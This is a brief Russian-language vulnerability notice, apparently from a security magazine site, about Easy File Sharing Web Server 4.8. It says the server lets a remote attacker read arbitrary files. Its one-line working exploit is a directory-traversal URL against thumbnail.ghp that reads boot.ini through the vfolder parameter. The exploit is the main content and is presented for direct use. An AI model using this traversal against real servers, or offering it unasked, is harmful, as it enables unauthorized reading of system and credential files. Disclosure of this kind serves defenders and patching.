Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Easy File Sharing Web Server 4.8
Уязвимость позволяет удаленному злоумышленнику прочитать произвольные файлы
на уязвимой системе.
Эксплоит:
http://127.0.0.1/disk_c/thumbnail.ghp?vfolder=../../.././/./../../boot.ini